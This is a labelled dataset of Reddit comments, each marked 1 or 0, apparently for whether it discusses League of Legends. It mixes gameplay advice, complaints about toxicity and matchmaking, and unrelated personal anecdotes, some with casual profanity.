1	I would suggest the best way to get better is just play.   Flaming is pretty much going to be there to some extent everywhere, you just need to ignore it and play on.   Start with one role, practice that, expand it to a champion pool of 3 or so, I dunno how female champs go, but something like going support champs is a good way to blend into the PVP without having that great of a difference in terms of mechanics. If you want to feel like you can interact with the team members, start with a Good luck and have fun guys, Im still learning the game so if you want to give me some advice, that'd be great, but know when you say that, you need to take it with a grain of salt, if you think it seems reasonable, apply it to your current understanding, if not, then the other person doesnt always have to be right, there are going to be times when people are going to be rude jerks about 'go uninstall' or whatever other fancy insult they can come up with, you just need to ignore it, like any other insult that might be thrown at you from some faceless internet user.   You arent going to Ranked anytime soon, especially cause your champion pool would be a bit too low and you need a expansive runepage too. You need more experience in terms of getting better and winning games as well.   Consider watching informational streams, Voyboy for top lane, Krepo for support, yellowpete for adc, these streamers tend to talk about their actions most of the time to give insight to why it is that they are doing something and it gets more clearer for others to be able to do the same.   Remember the matchmaking system still works, so even if you have played 15 games, you are going to be qued against people who are of your level, the first few games or so might be very stompy on either side of the team while matchmaking gets a good balance but eventually it will even out, even if you lack experience.   As a fellow girl, I can relate to the nervousness, even though all my friends talk about how well I can play, I dont want to Ranked just cause I get the jitters, theres no better way to beat it than just playing.
0	The most surprised I've ever made a professor was over what was supposed to be a 4 hour final. It took me 45 minutes. Apparently, the next person finished over an hour later (I had a friend tell me). Initially, the professor thought I had a question about the test and asked me if I was sure I had all the pages. I got an A+ as well.   Honestly, for multiple choice and short answer (sometimes even a test with paragraph responses) I do not understand how it can take so long. Either you know it or you don't. There shouldn't be too much thinking or bullshitting involved.   Now everyone is going to be up in arms about critical thinking tests (math, applied science, whatever). I graduated 2 months ago with a degree in Ecology and Evolution. It was a shit ton of applying scientific concepts. And that is what makes the tests go by so fast. There isn't a lot to memorize and you don't have to go through whatever memory devices you use. Take the concept you know and apply it. Simple.   Now, didn't I just say memory devices can take up a lot of time during a test? This is true, if you don't use effective memory devices. A memory device should cover something very basic. For example: if you have to know the digestive system for an animal, just remember which organs food passes through - in order. Then each organ should have its own memory device which covers it's functions.   The memory device will differ from person to person. Some people will use mnemonics or pictures, whatever. I'm an auditory learner, so the easiest way for me to remember things is to simply listen in class and read my notes as complete flowing sentences once or twice before a test. So my memory devices are short simple sentences that I can immediately write down.   If you want to figure out what type of learner you are, this [chart]( can help.
1	This is E-sports we're talking about here. The world-class talent that emerges for the professional scene wont necessarily have highly developed social skills like say a professional baseball player would, since the baseball player had his sport throughout his childhood to surround him with people that wanted to socialize with him.   League doesnt do that. He hasnt delved with the masses for years prior to becoming famous. He sat in a dark room and kicked ass in summoners rift. Who learns how to talk to people face to face while staring at a computer screen 24/7?   Yes, OP, you're right. They SHOULD show better sportsmanship, but it would only be for the audience.
1	Google clamping, or use the reddit search function.   It makes sense if you know how the system works.   Basically there is system that clamps you if your MMR is bellow the next tier threshold.   It clamped you, all the way to your last win, then the clamping was removed (you surpassed the hidden MMR required for next tier).   So you got normal gainings, and lost normal gainings. That loss though pussed you back bellow the tier threshold, so the clamping went back in effect. Stop worrying about LP in I divisions, Everybody is tired of these posts.
1	Good.   Nice article, much apreciated . Now please make one for mechanics :( I recently started playing with my friends who just joined LoL. They freak Dota all the time, but still its apparantly quite different from LoL. I find it hard to focus on my own gameplay and guide them on what to build, when to farm, roam, push, objectives etc. Its simply impossible to play well myself when i think about their every move. A guide about mechanics and decisionmaking would be nice :)
0	I have a special place in my heart for people who stop and actually help when they witness things like this. I was rear ended by a drunk driver 3 consecutive times once. The first time, I thought my car had stalled out (super cold weather makes my clutch sensitive), but the guy tapped me and I didn't realize till we both turned left, I stopped at the next light and he hit me hard. I called the cops to get a report, got out of my vehicle and this guy was like "oh, we're good." and I saw the back of my poor car and told him we were not in fact "good" and that he would be pulling into the gas station with me. So he says no, and with all of the traffic piling up behind us, I crossed my arms and leaned against my car and said "That's cool, we can wait right here then." He was blocked in, so after about 7 minutes of cars honking at us, we pull into the parking lot. I stopped my car, turned it off, and this guy hit me again. For a split second, I thought he was just being a jerk...and then it dawns on me that he had just hit me for the third time, not the second. As I get out of my car, a guy in a suit is running towards us, screaming at the man who hit me. It was kind of amazing. "ARE YOU  ** ing INSANE? YOU JUST HIT HER THREE TIMES" and then he went off, asking this guy if he was drunk, etc. He had been on the phone with the cops, reporting a guy potentially trying to leave the scene of an accident when the third hit occurred. The police actually called my cell phone at that point and asked in a tone of very obvious astonishment, "M'am! Did this man strike your vehicle three times? We have a witness that is reporting that he is intoxicated." I was in a really weird state of mind at this point. This is not shit that could possibly be real life. So I waited till the officer arrived (His last name was husky- awesome.) and as he is approaching the other driver, he straight up falls down while standing still. The witness (who had gone into dad mode at this point because he had a daughter my age) was standing by the whole time, giving a statement while I was video taping drug dogs finding pills and this other guy failing a field test. Anyways, this witness was coming home from the airport, off of a long flight after being out of town for a week, and he STILL took the time to help a stranger. So awesome.
1	The short version is:   Cleaver fits a champion that deals the majority of their damage from their Abilities while Youmuu's fits a champion that deals the majority of their damage from their Basic Attack.   Alternatively:   If the best way to use your champion's Basic Attack is to use it about once in between using Abilities, Black Cleaver is probably for you: Pantheon, Riven, Kha'Zix, Talon etc.   If on the other hand your champion uses their Abilities to position and then the best way to use your Basic Attack is to repeatedly whack your opponent over the head with it, then Youmuu's is probably for you: Jarvan, Nocturne, Xin Zhao, Tryndamere etc.
1	The goal with the penetration changes is to make them scale better into late game. With these changes, that early Brutalizer you picked up early doesn't become useless late game and actually synergizes well with Last Whisper if you want it.
0	I have to go through ivf to have kids. When me/my wife gets asked this (1 year anniversary next month) it makes me want to crack someones fucking skull open.
0	Holy shit people. It's just a fucking meme that's supposed to make you laugh or smile a little.  Parenting can be hard work. You have good days and bad days.  Like everything else on the planet, it's not always a grand ol' time and can be overwhelming now and then.  Everybody has those mornings where you say  "Ugh, I really don't wanna go to work today"  or days where you and the SO need a day away from each other. For those that are saying  "Shouldn't have had kids/WTF you suck as a parent"  do you tell yourself the same type of shit on those days? Do you go  "Fuck, I'm a shit employee/Should never have gotten mixed up with my SO" ? Get over yourselves. Parenting has amazing days and some shitty days. My experience is that the amazing ones greatly outnumber the shitty ones, but they do happen.
1	Why am I here? I’m a polling place “volunteer”—HA. Yes, because I willingly donned this Statue of Karthus getup and happily skipped outside to be a billboard for democracy. Even my undead derriere is sweating in this unseasonal heat. Go out and represent your constituency, they said. It’ll be great to have a representative from the Shadow Isles greeting people at the polls, they said.   Oh, look who’s here: it’s Leona with her sunny holier-than-thou disposition. Will you be voting “Yes” on the solar energy proposition? Of course; I’m so surprised. Too bad the Solari lobbyists don’t have half the charisma of their lunar competitors—hey! Sheath that Zenith Blade! 487 RP Careful with those spirit blades, Irelia. Although you should only be using the provided paper-poking implements, be my guest and stab away with your magic-trick knives. You have only yourself to blame if your ballot has hanging chads. 487 RP Riven! How many times do I have to chase you out of here? I don’t care about your supposed right to picket. No one here is going to listen to your third-party write-in shpiel, especially not after that social media battle-bunny scandal. 487 RP   For summoner’s sake, cover yourself up, Ruthless Pantheon! You’re the only one here to vote, not each of your 300 individual sinews. This is madness. Go wrap yourself in a booth curtain before I lay waste to every exposed inch of you. 260 RP From whom is that foul smell emanating?! It’s like rotting salmon marinated in cystic pus. It can only be Junkyard Trundle. I guess everyone has the right to express his opinion in the matters of governing our fine realm, because clearly politics are easier to grasp than basic hygiene. 487 RP And now Jurassic Kog’Maw’s drooled caustic acid all over his booth. Disgusting. And, naturally, he’s eaten his ballot. Someone pry open his ribs and dig it out before he leaves it behind, encased in a fossilized lump. 487 RP   This fake torch flame won’t burn anyone, but I wonder if it’s hard enough to leave a decent bruise. Oh, excuse me: goodbyethankyouforvotinghere’sastickerhaveawonderf ulday . (Until I end it.) The polls are open from November 6 to November 9, so don’t forget to cast your vote—there are plenty of tempting sharp pencils in the booths...
0	Eagle Scout here, I also participated in a troop where nothing happened to the scouts and was also surprised at the shit that came up after I left. However, we did have one weird dude who's son joined during my last year or so before I left. He just behaved oddly, and none of the kids liked him, but that never went anything further than us making fun of him behind his back (his son included, cool kid).   Other than his creepy vibe, he never really did anything that made us uncomfortable. That is UNTIL we went to a popular summer camp in North Carolina. This was my last year in scouts, I fulfilled all my Eagle Scout reqs, and didn't care to earn anything else, so I went to hang out with my friends and spend quality time with my dad. about the second day into the trip we were in the showers, getting ready for dinner services when in walks Creepy Guy with his son.   Adults and scouts bathe in separate facilities, this is known. Immediately I and the two other older scouts from my troop block off the entrance to the showers and ask what the hell he thought he was doing. He tried to say something along the lines of his son was afraid of bathing publicly, and he just wanted to be there to comfort him. His son is 13-14, so of course this threw up a whole bunch of "bullshit flags" from all of us.   I inform him that as senior patrol leader that I would make sure nothing happened to his son in the showers, then assured his son that the shower facilities were separated by curtains so he'd have plenty of privacy. However, there was no way in hell I was going to permit an adult to enter the boy's showers. Even though I was 17, I'm a big guy 6'4" and ~280 lbs back then, I towered over this man and knew without a doubt that I could stop him if he tried to force his way past me.   He started hemming and hawing, insisting he be allowed to enter with his son. By this time one of the two older scouts from my troop had gathered his things and left to find our scoutmaster. I told the creepy guy that summer camp was about learning to be a stronger, more independent person, and learning that in things you fear you cannot conquer on your own, you can rely on your friends to help you. Relying on his dad to be there with him every step of the way will not foster a healthy adult, etc etc.   I should point out that after the initial denial of entry, the son was trying to convince his dad he should go in alone. But the father was adamant, until he saw the Scoutmaster and 2 other adults from our troop arrive. They carted him off and everyone finished bathing in peace, though it was awkwardly quiet as no one was talking/joking like before. Creepy dad was forced to go home early, with the scoutmaster paying out of his own pocket to refund CD's registration fees. My dad said that CD tried to have me expelled for being disrespectful to my seniors, to which my Scoutmaster said that if CD would have to first act like my senior before he would even consider it. CD was told that if he ever tried anything like that again, they'd call the cops and press charges.   After we got back (CD's son stayed, and rode home with me) CD's son was picked up by his mother, and every scout meeting after that, his mom was the one who dropped him off and picked him up. At least, that's the way it was until I left, last I heard he transferred troops, but I know my old Scoutmaster let the new troop know the situation with CD.
0	Had a friend who dared me to "flick off" another friend at the lunch table.  So, as the cool 5th grader that I was, I did the nonchalant middle finger rubbing the eye trick.  Little did I know, my annoying childhood friend had already told the very meanest lunchlady of my endeavors. I had to sit at the "red light" table for a week.
0	When you figure out what the laws are in the state you are in where the recording took place and it is a one party consent to record state, make sure you check that the state you are divorcing in will recognize that recording if they are a 2 party state.   I am not a lawyer, but I like to dot my i's and t's.  So check with your lawyer and maybe call a few in your home state and just ask on the phone and see if anyone will answer the question.  maybe  get a few confirmations or even retain a lawyer in the home state... or the whole situation in reverse states depending on how your lawyer/situation is.
0	This will probably get downvoted to oblivion or buried, but there's something that a lot of you people don't understand about rape.  And that bothers me.   Consent is not a one-time thing.  It must be continual, which it is unless someone puts a stop to it or becomes unresponsive.  If someone says yes to having sex with you, then yeah, sex is fine, but each person has the right to call off said sex as soon they want to.  I don't know how long it took this guy to pull out, but if she was crying and freaking out, that's probably too long.  Legally, that is unambiguously rape.  It doesn't matter that she had consented initially.  She wanted to end it, and she was allowed to do that.  I know that might sound like bullshit, but there's a pretty good reason for that.   Usually, when we think about rape it's some guy jumping out of the bushes to attack a woman with a knife.  That kind of rape is actually pretty rare.  Most rapes are perpetrated by someone who knows the victim, often in situations like this.  This might seem like a "minor" rape, but "minor" rape does not exist.  All rape can have a very powerful effect on the victim.  Sex is an act of intimacy and bonding.  It's opening up oneself to someone else.  A forced perversion of that can really mess with someone's head.  It's one thing to threaten someone's safety to force them to open up, and while it might be a tad different to just force yourself upon someone, the underlying damage that the perpetrator does is still the same.  The guy might have been sorry.  Hopefully, this played into his sentencing, but he still committed the crime of forcing this woman's intimacy when she didn't want it.   Now, some people might be calling bullshit.  I don't really know any more than what has been presented to me in this thread.  I don't really care.  If a court of law of law convicted him, and the OP's description of events is accurate, then I'm happy for her and hope that she can put back the pieces of her life.  If she lied and this guy got convicted, then yeah, fuck her, but I would like to point out that false accusations of rape are believed to be pretty rare, especially compared to actual rape.  False accusations are terrible and can ruin a person's life, but equating the risk of this happening with the risk of getting raped for real are not even close.  And finally, if the whole thing is bullshit, whatever.  This is reddit, and if someone gets imaginary internet points for a lie, I can't really say that I give a shit.   I mostly came here to point out that rape not only can happen to anyone, but it can be perpetrated by almost anyone as well.  Know your rights, and those of the person you plan on having sex with.  It's not terribly complicated.  If you aren't sure about something, just ask them.
1	To be honest, I report people the most when I see in chat, that they say they are playing bad on purpose for one reason or another.  Mainly, cause I don't want to play with them again.  Half the time, the person states in chat very clearly, that they are feeding on purpose, even if it is only 5 deaths, one or two of those deaths may be at a critical moment, and they just laugh it off / say in chat "LOL dying is fun" then we lose 2 turrets and can't recover.  So tired of it, most games I play someone dies 5-8 times before 10 min mark, then just trolls, sometimes manages to steal 4 kills before we can surrender, and people in tribunal think they tried.  I've judged 100 or so cases, and I know that if you read chat / actually look at the reports you can tell if it was a troll or not.
0	Or even girls.   More than a few times I've had random drunk girls come up and just hug or kiss me... believe it or not, it wasn't the the end of the world... I was actually kind of flattered.   I have a feeling if I did that to a girl though, the story wouldn't be the same.
0	Be nicer to them   Can be considered subjective. What are the circumstances? Are you normally nice to people? If not, then would you normally treat a disabled person better? Is the disabled person treating you decently? How have they affected your life?
0	I believe what OP was trying to say is that mainstream rap used to be about real issues where as mainstream rap now is about shallow crap and partying. but as he said it your point stands correct.   though I do think its funny his name is motley crue, in the 60's most mainstream rock was much more serious shit and less about just getting high and fucking chicks and in the 80's shitty hair bands like motley crue flooded the radio with shallow garbage.   so
1	I feel for ya man. I was afraid of this after reading Riots plan. I dont plan on playing ranked with this system as it promotes stagnation in my opinion. Also how does the idea of a best of 2/3 and 3/5 fit in a team based game  where you're partnered with random people . I could see 2/3 and 3/5 in ranked 3s and 5s because it makes it feel like a challenge with your team to get higher. In solo queue though, it feels like a random mechanic that they thought would be cool on paper. The system really only works for those that can play a ton of ranked every day/week. Otherwise its very hard to maintain the win rate required to advance consistently.
1	You didn't read his post properly. He said false reports gets suspended for a week.   Also your
1	You have three lanes for gold/experience plus the alternate, contestable source of the jungle. The 2:1:1:jungler meta evolved as three proper farming champions assisted by a jungler and a 0cs support was the most effective gold distribution system for teams.   Riot decided that all roles should get gold and scale, resulting in the major s3 and s4 changes. Personally I think thats a flawed idea given the three lane setup and the fact many skills are impactful regardless of a champions wallet. It resulted in traditional supports being eclipsed by kill lane supports like Leona/Anni/Thresh or stolen by midlaners as their scaling utility and damage is insane when supported by proper gold income. Similarly junglers like Maokai and Amumu were eliminated and ADCs found themselves losing their niche as the undisputed damage source without gaining any real compensation, as illustrated by the endless "ADC isn't fun anymore" threads on reddit
1	I always, always got mega pissy when I would see the Ashe on our team take mid. I was always like WTF.   Then a mate explained to me that Ashe hawkshot could almost reach both lanes mid games when ganking started. Point being that Ashe in mid could hawkshot when MIA was called to help her mates, hawkshot blue buffs etc.   It was not until this that I saw Ashe as not a damage champ but a Utility champ.   So to answer your question, I feel like she still has a massive roll in any team. Yeah Caitlyn can drop traps for constant vision in mid bush (not that it give vision but it traps player as they run though, preventing ganks) and she can finish off with her ulti however as a ranged carry she cannot do what Ashe does in that she can check across the map baron, dragon and buffs.   In terms of poke though, Kog is still friken amazing! His attack speed can be capped at the highest in the game which make him a backdoor slut 9. His ulti can scrub check more often than Ashe hawkshot etc. etc. How ever his CC is no where near that of Ashe's Q or R.
1	Except Starcraft didn't have  near  the competitive following League has, so it's kind of a false equivalency.   There's also the amount of money people have invested into this game. What's the reason most people say there won't be a Team Fortress 3? TF2 has been around since 2007 ish, and it still receives updates and has a steady following. The reason there won't be a TF3? Hats. Some people's backpacks have so much money put into them that Valve would have a shitstorm like they've never seen if they made a 3 without porting people's backpacks over. The same goes for all the skins and champs people have bought, the people with rare skins, etc. If they were to abandon League completely for a new game, or, even worse, make a LoL2, you'd bet people would flip their shit. Even more so if they did like you said and left half the champion pool in the dust, between roughly half the community flipping their shit over the fact that their favorite champ doesn't exist anymore and the other half being angry about their skins carrying over.   In fact, the more I think about this, the less your scenario makes any kind of sense. First off, what sense does scrapping half the champion pool to make a new game make? How would that even work? I see 3 outcomes:   A) Half the champions are ported to a new game, League 2. No new champs are added, the map is largely unchanged because MOBA, there is a new client.   B) Half the champions are ported to a new game, League 2. A new selection of champs of roughly the same size or larger is added, the map is largely unchanged because MOBA, there is a new client.   C) There is a new game with a full selection of new champions called League 2. The map is largely unchanged because MOBA, there is a new client.   All three of these are beyond pants-on-head retarded. Scenario A (which is so high on the "things that would never happen" scale that it reads ERR when measured) would obviously be a dumbfuck move because literally no-one would tolerate that. Scenario B and C wouldn't work because it would be far more work to invent THAT many new champions to revitalize interest with a second game rather than just keep morale high by steadily releasing new skins/champs and fine-tuning the existing game (like updating the client). Abandoning League for another LoL game, especially under the same name isn't just stupid, it's straight-up SonicTeam-level shit.   Finally, LoL isn't just a game like Starcraft, TF2, or any other game with a competitive following. It's not just an eSport, it's  the  eSport. There are others, but none have the same following League does. To abandon LoL, even 6, 7 years from now, would be corporate suicide. If anything, we have evidence to show that when it gets aged, they'll just update the game to make it less so (see: champ reworks/VUs/TUs/Summoner's Rift Update)
1	To OP, Op.gg doesn't show ALL games, i'm currently trying to find a game to talk about and give evidence   but recently i played an elise jungle game, we were blue side so I started red and on my way to wolves i look at our mid lane karthus at 20% HP and he is pinging me for help, I wasn't even half way done with my first clear.   I tell him to back and heal, CS is not worth more to you than a death, so I do my wolves, half way though doing my blue I see "First blood", it was karthus. He immediately got on to all chat @ minute 3 and said "report noob elise" I told him again he should have backed and let me at least do my first clear before complaining, I had no coocoon I was level 2 when he was pinging me.   After that he went back to lane and CS'd while I ganked bot and got them rolling, we eventually won and he said sorry and gave me an honor.   The people who go into games with pent up rage are what cost most games, not kids.   Never go into a NEW game on tilt, always take a break if you fell like you aren't clear in your mind.   In my experience people get salty really quickly not just in ranked.   this would help if they took more break and didn't go on 8 hour grinds to get LP.
0	That's actually how I knew the girl I fell in love with and lived with for 50 years was a made up, I couldn't recall her face upon waking. Just a nose-like obstruction and indents where her eyes would have been. She talked to me despite not having a mouth. Dreams are weird.
1	They're a business. They buffed Ezreal when a $30 skin was being released. People seem to ignore the fact that they are trying to maximize their profits. They do the same things blizzard does in WoW,  except  they don't  force  you to pay a monthly subscription or upfront payment to play their game. While initially this seems amazing and great, it creates the problem of "what can make the most money becomes the important thing on the list". The stealth rework took forever because new champions bring new income and there are a lot of people who already own Eve and Twitch. Look at skin releases relevant to champion buffs/nerfs. Most skin releases either come with a buff a week or two before or a nerf a week or two after. I don't know of an instance where a champion has gotten a skin the same patch they recieved a nerf (I could be wrong if I am please prove me so), but I do know of a few instances where a champion was buffed the same patch they recieved a new skin. You could call it coincidence, but coincidence doesn't happen so regularly.
1	I feel pretty good about the Tribunal, actually. I think there was a noticeable improvement in high level games after it was implemented. The worst I usually see these days playing on a level 30 account with a decent amount of Elo in both normal and ranked is a lot of "omg report x" and "omg x feeding report please" followed by the inevitable "bg 1v9". And if anyone else is being any worse, they're usually reported by 4-5 people in the game. However, I think one big unfortunate side effect of the tribunal is that lower level games may have gotten a lot worse. When I play on my smurf account, the people are absolutely awful, although it is possible that it always was that way and I just don't remember it.   As for the judgments of the Tribunal, I feel that they're generally pretty harsh. I usually, in 15 cases give out 12 punishes, 2 pardons, and a skip and when I get the email telling me how many cases I got "right" it's almost always 12. However, I don't believe that sob-stories about unfair punishment from the Tribunal either; I think I'm just a little more sympathetic sometimes and let people off who shouldn't be let off.   Also, f2p team games will always have the potential to be pretty toxic in-game environments. I would say LoL at its worst (the period right before the Tribunal was implemented) was about equally bad as WC3 DotA pub games, f2p Korean MMORPGs, and certain CS:S servers for example. However, I feel that since the Tribunal was implemented, LoL hasn't been nearly as bad as these other f2p (f2pish for CS:S) games.   As for Starcraft, as a long-time member of TL (BW, son), the community has always been pretty mature by internet standards (not the subreddit though...), but was a lot more crass before the enormous influx of new members from Star2. People called each other things like "faggot" pretty casually in the BW days, but not usually in a ragey sort of way, so it was both mature and immature at the same time. The Iccup ladders, I hear, could be pretty bad though both in terms of crassness and rage. Star2 has really "mainstreamified" the SC community, especially with the enormous growth of eSports in the west and I feel that the community as a whole has become both less crass and less mature with all of the bandwagoning, balance whine, and witchhunts. So the SC community remains both mature and immature at the same time, but is still pretty good for an internet gaming community.
1	lux can burst a squishy in 1secound.   you cant compare 2 diffrent roles by the just using the criteria of one role.   in this case you comepare ap burst champs, who should burst the enemy squishys, how they would fill in the role of an ad dps carry.   karthus  for example is a ap dps champs and he can wreck enemy teams in secounds.
1	Let me use my last game as an example.   I'm playing Udyr, cleared my buffs, head over bot to see enemy Malphite coming to gank. So I countergank, and we kill him, Draven, and Soraka. I'm pretty happy about bot, so I help mid and he gets kills off Zed twice.   Meanwhile on top lane, our "AP Nid" is playing vs a teemo who she does kill once, but teemo continues to be annoying and farms up.   20 mins in, we get a couple dragons, score is about 24/10 overall. Suddenly, nidalee complains about it being a badgame 'bg' she says.   We ignore that comment, and continue to push lanes. Nid gets caught out and dies, immediately starts surrender vote. We all decline. She keeps saying "we're gonna lose" for no apparent reason. I mute her and continue playing. At this point, trist also has a bad score, even from her being 3 kills ahead in lane. I have no clue how.   So 10 mins of defending, nid and teemo getting caught out, the kill difference is 25/38.   Eventually , we lost two inhibs, and lost the game.   My point, however, is that what do I do when someone decides to 'down syndrome' the team and we lose a winnable game.
0	Oh man I had one of these when I worked in big box retail. It was the most gratifying experience ever.   We had the same policy, where we weren't allowed to ask for ID unless explicitly requested by the POS.   We're closing up shop for the evening, for reference 8pm. 8:03 rolls around, and the tumbleweeds are rolling through the store, save for one single soul. She casually meanders up to the counter with nearing a thousand dollars worth of electronics. Carefully lying them on the counter, she willingly, no,  boastfully  lays out her credit card and ID on the counter (and of course they matched - why else would she offer). Now, our POS had a security feature where we were required to manually type in the last 4 digits printed on the card (in order to verify that they matched up with the number that was actually read from the magnetic strip). Of course it didn't.  Cue excitement. , and she was, of course, no less than shocked that I was unable to process her transaction.   She huffed and begrudgingly agreed to try her "daughters" card (who was outside waiting and came in to assist - they couldn't have been more than 10 years different in age, but who am I to judge). Surprise, same issue.   Lady is "baffled," so I tell her I can enter the card number manually (the one on the front of the card). She disdainfully agrees.   I do it, only to be prompted by the POS to call the merchant to authorize the transaction. I can barely contain my excitement. I am rarely ever afforded the opportunity to shut someone down so hard (mostly because any sane swindler would have put a stop to it at this point) so of course I jumped at the chance. Yet again, she tells me that I have to sell her this stuff and that it is somehow an issue with our register.   I cheerfully dialed the merchants 800-number, maintaining what she thought to be my most diligent customer-service smile, when in reality, I was struggling to contain my fit of maniacal laughter.   I follow the phone representatives instructions to the letter, matching IDs, reading account numbers (several times), ID numbers, names, et al.   After about 15 minutes of this, the lady on the other line drops the bomb shell, and I almost exploded with excitement:   "The name on her ID is  definitely  not the name associated with the account."   I relay the information to the customer.   "Well, it could be in my husbands name."   I give his name to the representative.   "Yeah, that's definitely not it either."   Once more, I manage to express shock and dismay to the con-woman and her "daughter," explaining that I "completely understand her frustration and have no idea how this could happen." All the while, in my head, the excitement was nearing on oozing out of my nose.   "Oh, well, I'll have to call the bank and sort this out!" she huffed, and out the door she went, itemless.   The fun I had at the audacity and stupidity of this woman and her cohort was well worth the extra 20 minutes past closing, plus returning the unsold merchandise to the shelf.
1	Honestly, this 100 times over. Just step away from the game for a bit if you get salty and go on tilt. Typically you're being self destructive to yourself and you start not paying attention to why you lose. Try to take something from each game you play. Take notes each time you die on a piece of paper and explain why you died. Positioning is a huge reason why I will die.   That being said, the OP's post pretains to feeders and afk's causing him to go on tilt. It is unfortunate but it happens. But the enemy team has a higher chance of getting the feeder or AFK than your team does. As long as you are not the problem your team has 4 out of the remaining 9 players and their team 5 of the 9 players. They are 11% more likely to have a feeder or afk than your team does.
1	Here's something that took me 1,5 years to learn. Although you meet lots of players in game, you dont have to interact with all of them. You should mainly focus on your own mistakes and improving your play (which includes teamplay ofc). It's a choice to communicate with someone. You dont even have to mute people. You should just realise that you dont have to respond to chat. Especialy pre 30 it's not as important to win. Much rather you want to learn the game. So focus on learning the game, instead of trying to win. Make mistakes, try out stuff, learn from it, get better. This is also the case with games post 30, and ranked games.
0	I used to think this, so I did. I moved to a new city interstate, around 800kms from my hometown.   But it didn't solve anything. I suffer from Adjustment disorder (type of depression/anxiety, and have done since I was 17, 21 now), and thought that by moving my whole life entirely I'd move away from my stressor, find a new niche to start my life, and escape what had made me want to complete suicide in the past.   In the end, my roommates end up saving me from litterally the edge of suicide. I didn't know how to cope at the time, and I'm not entirely sure now, but at least I've gotten better - and discovered how to cope with life at large.
0	Actual chef here. The last time I cooked for my family who lives 5 states away, I was making simple rice pilaf to go with whatever my dad was grilling up. Totally mixed up the stock to rice combo and made this gross gruel. I've been making rice the same way for 16 years of my life.
1	Seeing him crab-sidestep into rooms awkwardly was so amusing.  He didn't take the blindfold off until we had finished close to 65 oz  of varied liquor and found that someone had made bacon in the kitchen.  In order to keep him from bumping into things in his increasingly drunk  and blind state, he was put in charge of making eggs.  Apparently properly frying eggs is more important than Noxus invading.  shrugs
1	it isn't racist.   however, its a tad bit hateful. i think its more of a matter where the OPs pride of europe lends itself to ignorance as well. there is nothing wrong with being proud of such a region where strong players have always been in abundance.   Yet FNC as an esports organization is one of the best and their eye for scouting skilled players to play within its ranks is one of the best there is.   So considering FNCs history as such, especially the League side of the org, if i were the OP, i'd just shut up and wait before saying anything. He is completely right in saying Europe has very strong players, however, if FNC decided to go for the two koreans over every other player that was tried out, chances are it happened because of something other than the fact "lol-they-are-korean-must-be-good" circlejerk that usually permeates this subreddit. In fact, you should be giving FNC the benefit of the doubt here due to the previous results we've seen with some teams that had korean players in their ranks e.g. the bad (CLG with Seraph, most recently Ryu with MIL) and the good (SHRC with Zer0 and inSec); they know the pros and cons of bringing foreigners into their lineup.   also, to any other people out there that say they are no longer a fan because of the roster changes... just putting it out there, you were never a fan of the team to begin with if the inclusion of two koreans upset you. you were a fan of the players, which is completely fine and normal. Don't get two mixed up though because it makes you look silly, unreasonably bitter and a bit of a bigot to boot.
0	Did it a couple weeks ago, broke up a few weeks before that. Obviously painful, but only because the reason we separated was she didn't feel it was "the right time." She had just gotten out of an 11-month, relationship about 4^1/2 months before we got together, practically engaged relationship and literally less than a month after we broke up, she's dating another dude. For reals? It wasn't the right time after almost 5 months, but 1 more after that and you're good to go? My feels... :'c
1	Am I alone in thinking that the IoW/Field of Justice/Summoners idea is actually MORE important than the backstory of the characters? Otherwise it's a game without drive; the characters themselves are just tools for the game's justification -- not the other way around.   I think the biggest issue is this coupling of the IoW and Valoran itself. Like hey we have this people that co-exist with the champions but they have the ability to control you but somehow you're totally cool with that and they play chess with your lives to decide how things in your world go.   Hear me out: what if the IoW/Fields of Justice/Summoners were on an entirely different ethereal platform. The people of Valoran go about their business as usual, with this conflicts or whatever. Summoners are essentially ethereal god-like entities who summon the famous heroes in their world. When they're summoned, they are now puppets and summoners can unleash their "true potential" with the skills of the summoner (which includes masteries and runes and summoner skills). Valoran is aware of the summoner's existence and retain memories of the battles, but they are powerless in stopping the summoners from doing their bidding. Some champions thrive on the limelight and wear it as a badge of honor (draaven!!!) while others detest it (think like a janna, who isn't kill thirsty). They still have to deal with their day-to-day conflicts (iona vs noxious), but at any time they can be summoned by some summoners who find them to be the preferential pick (draft mode??) to settle their disputes. It seems to me this decouples the two nicely while still making things work how they are now.
1	Where can I find more information like this? I like his "I learned we should've taken bot outter turret instead middle".   I've been looking for more stuff like this. It's easy to find how to build, which runes to use, which combos to utilize with certain champions, how to counter a certain enemy champion. But this kind of GENERAL and situational game knowledge is REALLY hard to acquire, you either pick it up when it happens in a game either from your mistake or the enemies, but sometimes us casual gamers don't take the time to evaluate each mistake as they happen.   so
1	You see darius heading your way like a bull and is followed (!) by his teammates. He is getting to you on flash + grab range - I flash   You see singed running towards you on his ult - I flash before I get flinged   You see jax setting up his stun and going into range for his jump (or flash jump) - I flash   etc.  All these above when you are out of postion and bruiser is followed by teammates. If he isnt followed just crush him, because HE is the one out of position and your teammates are closer.   Also dont take this like its the only truth - thats my style, mostly because I main no escape adc like ashe or kog
1	Her ult actually does require some skill to use. I remember a couple weeks back there was a thread for people asking mains of champions for tips on how to play certain champions and a lot of people asked how to play Kayle and I gave a lot of good tips in that thread. Her ult is not just press R on someone, you have to first determine who is fed on your team, who is most likely to be focused, etc. In team fights, depending on the positioning of your team, you may have to ult a different person each team fight depending on who is where. Also, a lot of people think a good Kayle ult is when you ult someone who is low and about to die - but that's not good. A good Kayle ult is when you ult someone BEFORE they take a lot of burst damage that way they can get out of the fight with all of/most of their health remaining rather than end a team fight with no health and have to back. Besides, Kayle has less range than Vayne.
0	I don't care what you do within the privacy of your own mind as long as your perverse thoughts aren't leaking out into the rest of the world.
1	When you are playing with flamers. The first bad thing they say that you do not like. Hit tab and click that speech bubble next to their name. You have no idea how efficient that button is. It just mutes them, and you have nothing to do with them any more. At the end game you can even report that player, and might not even see him ever again. You are getting these players, because those guys are mainly smurfing (making a new account to level up). So they get pretty annoyed when they see bad/new players. Yeah, it's not fair on new people who want to try out the game. I just hit the mute button. I hope this helped!
1	Biggest piece of advice I would give anyone would be not to let frustration get the better of you. There are so many keyboard warriors on League that just wait for you to make a mistake and then bitch about it for the rest of the game. Just play the game, and if someone makes a mistake, keep playing, you would be surprised by how easy can be to comeback in a game of League sometimes.
